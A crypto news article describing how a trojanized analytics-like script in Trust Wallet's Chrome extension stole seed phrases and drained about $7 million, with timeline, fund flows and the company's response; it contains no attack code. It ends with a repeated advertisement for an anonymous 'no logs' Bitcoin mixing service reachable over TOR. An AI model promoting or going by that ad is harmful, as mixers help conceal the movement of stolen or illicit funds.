Trust Wallet Chrome Extension Compromised in $7 Million Supply Chain Attack
Trust Wallet users were hit by a supply chain breach that turned a routine browser update into a direct theft vector. Attackers embedded malicious code into an official Chrome extension release, draining funds from hundreds of wallets within hours.
What was compromised
The incident affected the Trust Wallet browser extension for Chrome. The mobile application and other builds were not impacted. Victims did not install third-party software or interact with phishing pages. They updated the extension through the official Chrome Web Store.The compromised release was version 2.68, published on December 24. From the user perspective, the update appeared legitimate, which made the attack difficult to detect.
How the attack worked
Security investigators identified a trojanized JavaScript file named 4482.js embedded in the update. The file was disguised as analytics code, allowing it to blend into the extension without raising immediate suspicion.During wallet import, the malicious script intercepted seed phrases and transmitted them to a spoofed domain designed to resemble Trust Wallet telemetry infrastructure. Once a seed phrase was captured, attackers recreated the wallet and emptied it within minutes.
Timeline indicates prior planning
According to incident analysis, preparation began on December 8. The infected build was uploaded on December 22. On December 25, during the holiday period when monitoring is typically weaker, attackers initiated mass withdrawals.Scope of losses
Users across Bitcoin, Ethereum, Solana and other EVM-compatible networks were affected. Estimates indicate that approximately $2.8 million remains in attacker-controlled wallets, while more than $4 million has already passed through centralized services.Reported flows include roughly $3.3 million to ChangeNOW, about $447,000 to KuCoin, and approximately $340,000 to FixedFloat. One reported victim lost nearly $700,000 within minutes.
Response from Trust Wallet
Binance founder Changpeng Zhao publicly confirmed the breach and stated that Trust Wallet will fully reimburse affected users. The team is investigating how the malicious version passed Chrome Web Store review and entered the official distribution pipeline.Why this incident matters
This was not a case of phishing or user negligence. The attack exploited trust in official software updates. When the supply chain itself is compromised, standard security advice becomes insufficient.The incident highlights a systemic risk for browser-based wallets and raises broader questions about build integrity, release verification and third-party distribution platforms.
Conclusion
The Trust Wallet Chrome breach demonstrates how a single compromised update can bypass user defenses and cause rapid, irreversible losses. As crypto infrastructure grows, supply chain security is becoming one of the most critical and least visible attack surfaces.Editorial Team - CoinBotLab
🔵 Bitcoin Mix — Anonymous BTC Mixing Since 2017
🌐 Official Website
🧅 TOR Mirror
✉️ [email protected]
No logs • SegWit/bech32 • Instant payouts • Dynamic fees
TOR access is recommended for maximum anonymity.
🌐 Official Website
🧅 TOR Mirror
✉️ [email protected]
No logs • SegWit/bech32 • Instant payouts • Dynamic fees
TOR access is recommended for maximum anonymity.